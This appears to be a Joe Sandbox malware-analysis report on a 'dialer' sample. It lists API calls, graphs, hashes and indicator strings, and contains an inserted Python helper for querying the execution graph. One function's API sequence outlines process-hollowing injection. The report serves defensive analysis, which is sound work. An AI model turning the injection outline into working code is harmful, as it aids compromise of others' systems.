                                                        • Associated: 00000027.00000002.3127533864.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_39_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                        • String ID:
                                                        • API String ID: 3836936051-0
                                                        • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                        • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                        • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                        • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                                                        Control-flow Graph

                                                        Control-flow graph (rendered graph residue, summarised): function at 0x140002560-0x140002a8e. APIs referenced in its blocks: GetProcessHeap, HeapAlloc, HeapFree, K32EnumProcesses, ReadFile, ExitProcess, RegOpenKeyExW, RegDeleteValueW, ShellExecuteW, lstrlenW. Internal calls: sub_140001000, sub_1400010c0, sub_1400014d8, sub_1400016cc, sub_14000175c, sub_1400017ec, sub_1400018ac, sub_140001944, sub_1400019c4, sub_140001c88, sub_14000217c, sub_1400021a8, sub_140002a90.
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.3126754489.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000027.00000002.3126364002.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000027.00000002.3127169767.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000027.00000002.3127533864.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_39_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                        • String ID: SOFTWARE$dialerstager$open
                                                        • API String ID: 3276259517-3931493855
                                                        • Opcode ID: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                                                        • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                                                        • Opcode Fuzzy Hash: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                                                        • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741

                                                        Control-flow Graph

                                                        Control-flow graph (rendered graph residue, summarised): function at 0x140001c88-0x140001ebf; main path calls CreateProcessW, VirtualAllocEx, WriteProcessMemory, VirtualAlloc, GetThreadContext, WriteProcessMemory, SetThreadContext and ResumeThread; the error path calls OpenProcess and TerminateProcess.
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.3126754489.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000027.00000002.3126364002.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000027.00000002.3127169767.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000027.00000002.3127533864.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_39_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                        • String ID: @
                                                        • API String ID: 3462610200-2766056989
                                                        • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                        • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                        • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                        • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.3126754489.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000027.00000002.3126364002.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000027.00000002.3127169767.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000027.00000002.3127533864.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_39_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                        • String ID: dialersvc64
                                                        • API String ID: 4184240511-3881820561
                                                        • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                        • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                        • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                        • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.3126754489.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000027.00000002.3126364002.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000027.00000002.3127169767.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000027.00000002.3127533864.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_39_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Delete$CloseEnumOpen
                                                        • String ID: SOFTWARE\dialerconfig
                                                        • API String ID: 3013565938-461861421
                                                        • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                        • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                        • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                        • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.3126754489.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000027.00000002.3126364002.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000027.00000002.3127169767.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000027.00000002.3127533864.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_39_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: File$Write$CloseCreateHandle
                                                        • String ID: \\.\pipe\dialercontrol_redirect64
                                                        • API String ID: 148219782-3440882674
                                                        • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                        • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                        • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                        • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.3126754489.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000027.00000002.3126364002.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000027.00000002.3127169767.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000027.00000002.3127533864.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_39_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleModuleProc
                                                        • String ID: ntdll.dll
                                                        • API String ID: 1646373207-2227199552
                                                        • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                        • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                        • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                        • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                                                        Execution Graph

                                                        Execution Coverage: 2.2%
                                                        Dynamic/Decrypted Code Coverage: 0%
                                                        Signature Coverage: 0%
                                                        Total number of Nodes: 897
                                                        Total number of Limit Nodes: 2
                                                        execution_graph (interactive rendering; the exported node/edge list, with node addresses relative to image base 0x140000000, is reduced here to the API calls it records per subgraph)
                                                        • 0x140001000: __set_app_type; via 0x140001e00: __setusermatherr (CRT start-up)
                                                        • 0x140001160 (entered from 0x140001140): Sleep, _amsg_exit, _initterm, malloc, strlen, memcpy, _cexit; via 0x140001880: SetUnhandledExceptionFilter, which also reaches 0x140001ba0; then enters 0x140003240
                                                        • 0x140003240: wcslen, memset, _wcsnicmp, wcscpy, wcscat, wcsstr, memcpy, plus 0x1400027d0 (11 API calls) and the 0x140001404 .. 0x1400015f3 stub chain; wide-string path construction and comparison
                                                        • 0x140001394 (called from each stub 0x140001404 .. 0x1400015f3): malloc via 0x140006630, then NtCloseObjectAuditAlarm (as labelled by the plugin)
                                                        • 0x140001ba0 (reached via 0x140001a70 from 0x140001ab3, 0x140001ac3, 0x140001ae4): VirtualQuery, VirtualProtect, memcpy, GetLastError; 0x1400019e9: VirtualProtect
                                                        • 0x140002104, 0x14000219e, 0x140002050, 0x140001fd0, 0x14000216f: EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSection, TlsGetValue, GetLastError, free (CRT/TLS housekeeping)
                                                        • 0x140001e65, 0x140001f47, 0x140001e10: signal; 0x140001800: fprintf; 0x140002320: strlen
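The execution_graph export that Joe Sandbox emits behind the rendered picture is a flat token stream: `<id> <address>` opens a node, bare tokens that follow are the API names the node calls (or a collapsed `N API calls` summary), and `src->dst` is an edge. Because the report repeats a function's subgraph once under every caller, the same address can appear under several node ids. The following is an added example, not part of the Joe Sandbox report, that parses that stream and answers the two questions an analyst actually asks of it: which APIs a given address reaches, and which entry nodes reach a set of APIs of interest. The embedded text is an excerpt of the report's own export (the 0x140001ae4 / 0x140001ba0 cluster and the first stub of the 0x140001404 chain); the token grammar is inferred from the dump, and the treatment of `N API calls` as a nameless summary node is an assumption.

```python
import re
from collections import defaultdict

# Excerpt of the report's execution_graph export, kept verbatim.
GRAPH_TEXT = (
    "execution_graph "
    "2090 140001ae4 2091 140001a70 2090->2091 2092 14000199e 2091->2092 "
    "2093 140001b36 2091->2093 2096 140001b53 2091->2096 2095 140001a0f "
    "2092->2095 2097 1400019e9 VirtualProtect 2092->2097 2098 140001ba0 "
    "2093->2098 2097->2092 2101 140001bc2 2098->2101 2099 140001c04 memcpy "
    "2099->2096 2101->2099 2102 140001c45 VirtualQuery 2101->2102 "
    "2103 140001cf4 2101->2103 2102->2103 2107 140001c72 2102->2107 "
    "2104 140001d23 GetLastError 2103->2104 2105 140001d37 2104->2105 "
    "2106 140001ca4 VirtualProtect 2106->2099 2106->2104 2107->2099 2107->2106 "
    "2135 140001404 2208 140001394 2135->2208 2137 140001413 "
    "2138 140001394 2 API calls 2137->2138 2209 140006630 malloc 2208->2209 "
    "2210 1400013b8 2209->2210 2211 1400013c6 NtCloseObjectAuditAlarm "
    "2210->2211 2211->2137"
)

ADDR_RE = re.compile(r"^[0-9a-f]{9}$")       # e.g. 140001ba0 (image base 0x140000000)
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")      # e.g. 2106->2099
SUMMARY_RE = re.compile(r"^\d+ API calls$")  # collapsed subgraph, no API names (assumed)


def parse_execution_graph(text):
    """Tokenise the flattened export into nodes {id: {addr, label}} and edges."""
    tokens = text.split()
    nodes, edges, current = {}, [], None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif tok.isdigit() and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            # "<id> <address>" opens a node; label tokens follow until the next
            # node or edge. The "2" in "2 API calls" is not followed by an address.
            current = int(tok)
            nodes[current] = {"addr": int(tokens[i + 1], 16), "label": []}
            i += 2
        else:
            if current is not None:          # skips the leading graph name
                nodes[current]["label"].append(tok)
            i += 1
    return nodes, edges


def apis_of(node):
    """API names a node calls directly; summary nodes ('N API calls') give none."""
    label = " ".join(node["label"])
    return set() if not label or SUMMARY_RE.match(label) else set(node["label"])


def reachable_apis(nodes, edges, start):
    """Depth-first walk from one node id, collecting every API name on the way."""
    succ = defaultdict(list)
    for s, d in edges:
        succ[s].append(d)
    seen, stack, apis = set(), [start], set()
    while stack:
        n = stack.pop()
        if n in seen:
            continue
        seen.add(n)
        if n in nodes:
            apis |= apis_of(nodes[n])
        stack.extend(succ[n])
    return apis


def apis_reachable_from(text, addr):
    """Union of APIs reachable from every node carrying `addr`; the export
    repeats a function's subgraph once per caller, so one address can map to
    several node ids (0x140001394 is 2208 and 2138 in the excerpt)."""
    nodes, edges = parse_execution_graph(text)
    ids = [nid for nid, n in nodes.items() if n["addr"] == addr]
    if not ids:
        raise KeyError(hex(addr))
    out = set()
    for nid in ids:
        out |= reachable_apis(nodes, edges, nid)
    return out


def roots_reaching(text, wanted):
    """Addresses of entry nodes (no incoming edge) whose subgraph reaches every
    API in `wanted`, e.g. {'VirtualProtect', 'memcpy'} for code that rewrites
    protected memory."""
    nodes, edges = parse_execution_graph(text)
    targets = {d for _, d in edges}
    hits = set()
    for nid, n in nodes.items():
        if nid not in targets and set(wanted) <= reachable_apis(nodes, edges, nid):
            hits.add(n["addr"])
    return sorted(hits)


if __name__ == "__main__":
    for a in (0x140001ba0, 0x140001404):
        print(hex(a), sorted(apis_reachable_from(GRAPH_TEXT, a)))
    print([hex(a) for a in roots_reaching(GRAPH_TEXT, {"VirtualProtect", "memcpy"})])
```

On the excerpt, 0x140001ba0 resolves to VirtualQuery, VirtualProtect, memcpy and GetLastError, and 0x140001ae4 is the only entry node that reaches both VirtualProtect and memcpy. Treat that as a lead, not a verdict: the query, unprotect, copy sequence is the shape of an inline-hook installer, which would match the "user mode inline hooks" signature in the report summary, but it is also the shape of ordinary runtime relocation code (MinGW's pseudo-relocation writer uses the same three calls, and the CRT symbols around it, __set_app_type, __setusermatherr, _amsg_exit, _initterm, are those of a MinGW-built binary). Confirming a hook requires the memcpy destination, which the graph does not carry; the disassembly listing above does.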

                                                        Callgraph

                                                        • Callgraph of 110 functions, Function_00000001400026E1 through Function_00000001400022E0 (node and edge listing omitted)

                                                        Control-flow Graph

                                                        APIs
                                                        • NtCloseObjectAuditAlarm.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.3126776839.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000002A.00000002.3126385510.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000002A.00000002.3127214809.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000002A.00000002.3127581724.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000002A.00000002.3127971405.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: AlarmAuditCloseObject
                                                        • String ID:
                                                        • API String ID: 2871759311-0
                                                        • Opcode ID: 7499237b17bbcd1bcb6ebcadcdfb411da627e67431d6b901ef04fbd3b683fc4c
                                                        • Instruction ID: 6e9c43e43475a5412bc82c74bb0b22b7dbbc15337bd8e373d78586065a7e04e3
                                                        • Opcode Fuzzy Hash: 7499237b17bbcd1bcb6ebcadcdfb411da627e67431d6b901ef04fbd3b683fc4c
                                                        • Instruction Fuzzy Hash: BFF05FB6608B408AEA16DF62F85179A77A5F79D7C0F009919BBC857735DB3CC1A0CB40

                                                        Control-flow Graph

                                                        • Control-flow graph for the function at 1400027d0 (node and edge listing omitted)
                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: wcslen$memset$wcscatwcscpywcsncmp
                                                        • String ID: 0$X$\BaseNamedObjects\nrfynzqfftbrthxk$`
                                                        • API String ID: 780471329-1852451468
                                                        • Opcode ID: 15902d1b7b7c1152bf002bcb91e7a227e5a09ce1baa0d3d89b7276a5b6ab46db
                                                        • Instruction ID: f46a43ac56e251243c59ab79ca2c38daa8753cf984a422ac27c1eaf028b3c393
                                                        • Opcode Fuzzy Hash: 15902d1b7b7c1152bf002bcb91e7a227e5a09ce1baa0d3d89b7276a5b6ab46db
                                                        • Instruction Fuzzy Hash: DC125AB2608BC481E762CB26F8443EAB7A4F789794F414215EBA957BF5DF78C189C700

                                                        Control-flow Graph

                                                        APIs
                                                        Similarity
                                                        • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                        • String ID:
                                                        • API String ID: 2643109117-0
                                                        • Opcode ID: b749f654d0317d9e24de8ca2bf6692fcf531ea681135a2e2bde356a6ec223b5a
                                                        • Instruction ID: 145ef27ce15272fb8ed355f5aa63f0c9a1f5ede9e4593ea7d6eb0f0a7906d2e7
                                                        • Opcode Fuzzy Hash: b749f654d0317d9e24de8ca2bf6692fcf531ea681135a2e2bde356a6ec223b5a
                                                        • Instruction Fuzzy Hash: F55111F1611A4085FB16EF27F9947EA27A1BB8DBD0F449121FB4E873B2DE3884958700

                                                        Control-flow Graph

                                                        • Control-flow graph for the function at 140001ba0 (node and edge listing omitted)
                                                        APIs
                                                        • VirtualQuery.KERNEL32(?,?,?,?,0000000140007DE8,0000000140007DE8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                        • VirtualProtect.KERNEL32(?,?,?,?,0000000140007DE8,0000000140007DE8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                        • memcpy.MSVCRT ref: 0000000140001CE0
                                                        • GetLastError.KERNEL32(?,?,?,?,0000000140007DE8,0000000140007DE8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                        Strings
                                                        Similarity
                                                        • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                        • API String ID: 2595394609-2123141913
                                                        • Opcode ID: 28aadb8de5dc709acd0a0e5d247f6037aa628613dfc42422a511b90ca232dc4a
                                                        • Instruction ID: 2ed46510ed1d0a58bb00a12b4a38f7601a8ffa55d26e4d8577210080af0f0105
                                                        • Opcode Fuzzy Hash: 28aadb8de5dc709acd0a0e5d247f6037aa628613dfc42422a511b90ca232dc4a
                                                        • Instruction Fuzzy Hash: 064132B1601A4486FA66DF57F884BE927A0F78DBC4F554126EF0E877B1DA38C586C700

                                                        Control-flow Graph

                                                        • Control-flow graph for the function at 140002104 (node and edge listing omitted)
                                                        APIs
                                                        Similarity
                                                        • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                        • String ID:
                                                        • API String ID: 3326252324-0
                                                        • Opcode ID: dc48a205a360e40ccc39e5e09ba110344913a208c188809db43705c9a7f6a856
                                                        • Instruction ID: 9494385bac82c96470a5ad2ca80031d016a952209e6f2660f35a807c86e33b41
                                                        • Opcode Fuzzy Hash: dc48a205a360e40ccc39e5e09ba110344913a208c188809db43705c9a7f6a856
                                                        • Instruction Fuzzy Hash: 9121F5B0305A0192FA6BDB53F9483E823A4BB6CBD0F444121FF5A476B4DB79C986C300

                                                        Control-flow Graph

                                                        • Control-flow graph for the function at 140001e10 (node and edge listing omitted)
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CCG
                                                        • API String ID: 0-1584390748
                                                        • Opcode ID: e97456c2db4c566f3d7dc493090a254b32206473731b29f9c59ef8b921ac1576
                                                        • Instruction ID: 0d0cdd76e27464eab58c3101b34b7ecc2a8ef26ebffc61dfa6a838f535d4530f
                                                        • Opcode Fuzzy Hash: e97456c2db4c566f3d7dc493090a254b32206473731b29f9c59ef8b921ac1576
                                                        • Instruction Fuzzy Hash: 0E2159B1A0510542FA77DA2BB5903F92182ABCC7E4F258635FF19873F5DF7888C28241

                                                        Control-flow Graph

                                                        • Control-flow graph for the function at 140001880 (node and edge listing omitted)
                                                        APIs
                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                        Strings
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                        • API String ID: 544645111-395989641
                                                        • Opcode ID: 7818cc2df225a017ff44da82892a3b8f66bcfae0520395024c1ab092e30cd3b9
                                                        • Instruction ID: 78106683dca420d487733eb45b5c7fb140555e26720c20ee5b0ca44718aa059e
                                                        • Opcode Fuzzy Hash: 7818cc2df225a017ff44da82892a3b8f66bcfae0520395024c1ab092e30cd3b9
                                                        • Instruction Fuzzy Hash: F05105B6B11544DAEB16CF67F840BD82761A759BE8F548211FB19077B4DB38C586C700

                                                        Control-flow Graph

                                                        • Control-flow graph for the function at 140001800 (node and edge listing omitted)
                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: fprintf
                                                        • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                        • API String ID: 383729395-3474627141
                                                        • Opcode ID: ca6b003e7d5e4c1f7dddf901e9dd9bc29e86f15a224b0f641e9277e05f257cb0
                                                        • Instruction ID: 497f2bda4b805bebb598d258fe75f44a47035596d1a2b2a7541446a23c8471c2
                                                        • Opcode Fuzzy Hash: ca6b003e7d5e4c1f7dddf901e9dd9bc29e86f15a224b0f641e9277e05f257cb0
                                                        • Instruction Fuzzy Hash: 61F0F671A14A4482E212EF2AB9413ED6360E74D3C0F40D211FF4DA32A1DF3CD182C310

                                                        Control-flow Graph

                                                        • Control-flow graph for the function at 14000219e (node and edge listing omitted)
                                                        APIs
                                                        Similarity
                                                        • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                        • String ID:
                                                        • API String ID: 682475483-0
                                                        • Opcode ID: 87f9ce1bbc68f519e9da004e6316be91bec518300aea1fdf9716aad2947da55c
                                                        • Instruction ID: 8e95c5bf1582c2fa6f49c61d441952bd59d504a178f2dce2e4bc026802320bcf
                                                        • Opcode Fuzzy Hash: 87f9ce1bbc68f519e9da004e6316be91bec518300aea1fdf9716aad2947da55c
                                                        • Instruction Fuzzy Hash: 6501F2B5305A0082FA2BDB53FE083D82364BB6CBD0F454021EF0943AB4DB79C996C300

                                                        Execution Graph

                                                        Execution Coverage: 56.2%
                                                        Dynamic/Decrypted Code Coverage: 0%
                                                        Signature Coverage: 87.5%
                                                        Total number of Nodes: 8
                                                        Total number of Limit Nodes: 1

                                                        Callgraph

                                                        • Executed
                                                        • Not Executed
                                                        • Opacity -> Relevance
                                                        • Disassembly available
                                                        callgraph 0 Function_0000000140846321 1 Function_00000001408460B2 2 Function_00000001408460F0 2->0 2->1 3 Function_0000000140846070 3->2

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 1408460f0-1408460f3 1 1408460fd-140846101 0->1 2 140846103-14084610b 1->2 3 14084610d 1->3 2->3 4 1408460f5-1408460fa 3->4 5 14084610f-140846112 3->5 4->1 6 14084611b-140846122 5->6 8 140846124-14084612c 6->8 9 14084612e 6->9 8->9 10 140846114-140846119 9->10 11 140846130-140846133 9->11 10->6 12 140846135-140846143 11->12 13 14084614e-140846150 11->13 15 140846145-14084614a 12->15 16 14084619d-1408461bc 12->16 17 140846152-140846158 13->17 18 14084615a 13->18 20 140846184-140846187 15->20 22 14084614c 15->22 19 1408461ed-1408461f0 16->19 17->18 18->20 21 14084615c-140846160 18->21 25 1408461f5-1408461fb 19->25 26 1408461f2-1408461f3 19->26 33 140846189-140846198 call 1408460b2 20->33 23 140846162-140846168 21->23 24 14084616a 21->24 22->21 23->24 24->20 27 14084616c-140846173 24->27 30 140846202-140846206 25->30 28 1408461d4-1408461d8 26->28 44 140846175-14084617b 27->44 45 14084617d 27->45 31 1408461be-1408461c1 28->31 32 1408461da-1408461dd 28->32 34 140846208-140846220 LoadLibraryA 30->34 35 14084625e-140846266 30->35 31->25 36 1408461c3 31->36 32->25 39 1408461df-1408461e3 32->39 33->1 41 140846222-140846229 34->41 38 14084626a-140846273 35->38 43 1408461c4-1408461c8 36->43 46 140846275-140846277 38->46 47 1408462a2-140846302 VirtualProtect * 2 call 140846321 38->47 39->43 48 1408461e5-1408461ec 39->48 41->30 42 14084622b 41->42 50 140846237-14084623f 42->50 51 14084622d-140846235 42->51 43->28 52 1408461ca-1408461cc 43->52 44->45 45->27 53 14084617f-140846182 45->53 54 140846279-140846288 46->54 55 14084628a-140846298 46->55 60 140846307-14084630c 47->60 48->19 57 140846241-14084624d GetProcAddressForCaller 50->57 51->57 52->28 58 1408461ce-1408461d2 52->58 53->33 54->38 55->54 59 14084629a-1408462a0 55->59 61 140846258 ExitProcess 57->61 62 14084624f-140846256 57->62 58->28 58->32 59->54 63 140846311-140846316 60->63 62->41 63->63 64 140846318 63->64
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002B.00000002.3126900800.0000000140840000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000002B.00000002.3126441769.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000002B.00000002.3126900800.0000000140001000.00000040.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000002B.00000002.3126900800.00000001404DC000.00000040.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000002B.00000002.3126900800.0000000140500000.00000040.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000002B.00000002.3126900800.0000000140503000.00000040.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000002B.00000002.3126900800.000000014078B000.00000040.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000002B.00000002.3126900800.000000014080D000.00000040.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000002B.00000002.3136236054.0000000140847000.00000004.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_43_2_140000000_dialer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ProtectVirtual$AddressCallerLibraryLoadProc
                                                        • String ID:
                                                        • API String ID: 1941872368-0
                                                        • Opcode ID: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                        • Instruction ID: 1d24a93eb9004fb9ff5f788f669610d725ede0fbeb3cf7fc7a03e9414d8a6cfe
                                                        • Opcode Fuzzy Hash: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                        • Instruction Fuzzy Hash: FE611A32F4026255EB274BB6AF843E87751931D7B4F49433DCB79423E6FA7488668B02

                                                        Execution Graph

                                                        Execution Coverage: 0.7%
                                                        Dynamic/Decrypted Code Coverage: 0%
                                                        Signature Coverage: 0%
                                                        Total number of Nodes: 73
                                                        Total number of Limit Nodes: 2
